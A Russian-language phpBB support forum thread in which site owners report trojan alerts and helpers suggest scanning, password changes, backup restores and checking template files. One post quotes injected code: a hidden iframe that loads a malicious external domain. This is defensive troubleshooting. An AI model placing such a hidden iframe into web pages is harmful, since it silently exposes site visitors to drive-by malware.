[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[владимир1983]

pavelkim писал(а):после его чистки

Поиск по файлам выполнял по известному вредоносному коду?

pavelkim писал(а):какие файлы посмотрет

Если

pavelkim писал(а):"Найти пользователя"

То смотри memberlist_search.html
И читай [FAQ] Шаблон форума, CSS и html, где что "ковырять"

[pavelkim]

владимир1983 писал(а):Поиск по файлам выполнял по известному вредоносному коду?

еще при чистке форума. Это было около месяца назад. Сам код не сохранил.

Просмотр файла memberlist_search.html ничего не дал. Так же смотрел forum_fn.js - тоже ничего не нашел. Не могу приложить их к сообщению. В ответ: Закачка была отклонена, так как вложение было определено как возможная атака. Означает ли это, что я что-то пропустил и в файлах действительно есть вредоносный код?

[Sheer]

pavelkim писал(а): Означает ли это, что я что-то пропустил и в файлах действительно есть вредоносный код?

Естественно. При закачке какого файла?

[pavelkim]

Пробовал и .html и .txt
Каждый раз присутствовала угроза атаки при закачке.

Добавлено спустя 9 минут 44 секунды:
! Нашел трояна в следующих файлах:
simple_footer.html и simple_header.html

[TheRain]

Здравствуйте.
Захожу сегодня на форум к себе и вижу что nod ругается. Кинулся разбираться. В итоге оказалось что каким-то образом оказались заражены вирусом(?) .js файлы.
Firebug показал вот такой кусок кода на страницах:

Код: Выделить всё

<div style="z-index: -10000; visibility: hidden; position: absolute; width: 50px; height: 50px;">
<iframe width="50" scrolling="no" height="50" frameborder="0" src="http://activatedreplacing.is-very-evil.org/index.php?28d9000e56c2a63080ff89c6f5357591">
</div> 

Подробнее об этом и о мерах лечения здесь.
Мне помогло.

[lucifer]

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?

А смена почтового адреса форума с forum@***.ru на обычный gmail`овский может стать брешью в защите форума?
Сразу после таковой смены почтового адреса на форум попал троян (если верить avast`у).
Доступ к серверу не имею. Есть возможность удалить трояна через интернет?

[Sheer]

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?

Вранье.

lucifer писал(а):А смена почтового адреса форума с forum@***.ru на обычный gmail`овский может стать брешью в защите форума?

Нет.

lucifer писал(а):Доступ к серверу не имею. Есть возможность удалить трояна через интернет?

Нет.

[владимир1983]

AdmninsCluba писал(а):Хостер сказал

Пускай укажет на уязвимость.
В phpbb нет известных уязвимостей!

[lucifer]

Зайдя на форум обнаружил там:


При этом загрузка страницы прекратилась, так как Avast! распознал трояна.

Последние действия:
- смена админского почтового адреса
- отправка письма пользователю через массовую рассылку
- активация пользователей
- чистка кеша.

Версия phpBB: 3.0.7-PL1
Стиль prosilver
Заходил через другой браузер, картина таже.

Как это устранить? Форум является частью сайта. Необходимо просканировать сайт вместе с форумом на вирусы?

[владимир1983]

lucifer писал(а):Как это устранить?

Прочитать эту тему.
Используя FTP клиент найти вредоносный код и удалить его.

[Sheer]

lucifer писал(а):Необходимо просканировать сайт вместе с форумом на вирусы?

Просканируйте. Только как вы это сделаете, если

lucifer писал(а):Доступ к серверу не имею

[lucifer]

Sheer
Сканирование сайта и форума поможет обнаружить и обезвредить трояна?

владимир1983 писал(а):найти вредоносный код и удалить его.

А где он может засесть этот код? И откуда мог взяться?

[Garret_Dark]

lucifer писал(а):где он может засесть этот код?

Искать последние измененные файлы по дате. А в них искать код который видете на странице (Код трояна), меняете зараженные файлы на файлы из бэкапа (Если не сможете корректно удалить вредоносный код) или вообще все файлы восстанавливаете из бэкапа.
Ищите шелл - "левый" файл, опять таки файл по дате создания

lucifer писал(а):откуда мог взяться?

Обновитесь, поменяйте пароли на все, что хоть каким боком связано с форумом.

[lucifer]

Garret_Dark писал(а):Обновитесь, поменяйте пароли на все, что хоть каким боком связано с форумом.

Я всё же связываю проникновение вируса со сменой почтового адреса форума, поскольку сразу после этого пришёл вирус. Либо после активации пользователей..
А что значит "обновиться" и можно ли это сделать не имея доступа к серверу?

[Garret_Dark]

lucifer писал(а): не имея доступа к серверу?

Хмм... Пропустил этот момент.
Не имея доступа к серверу, через админку можно править только файлы шаблона...
Я считаю, что код, скорее всего, появился после очистки кэша (Причем тут почтовый адрес то? Это просто запись в БД) и в этом случае как раз таки код находится в шаблоне, но искать его придется ручками, скорее всего он в overall_header.html если вообще в шаблоне...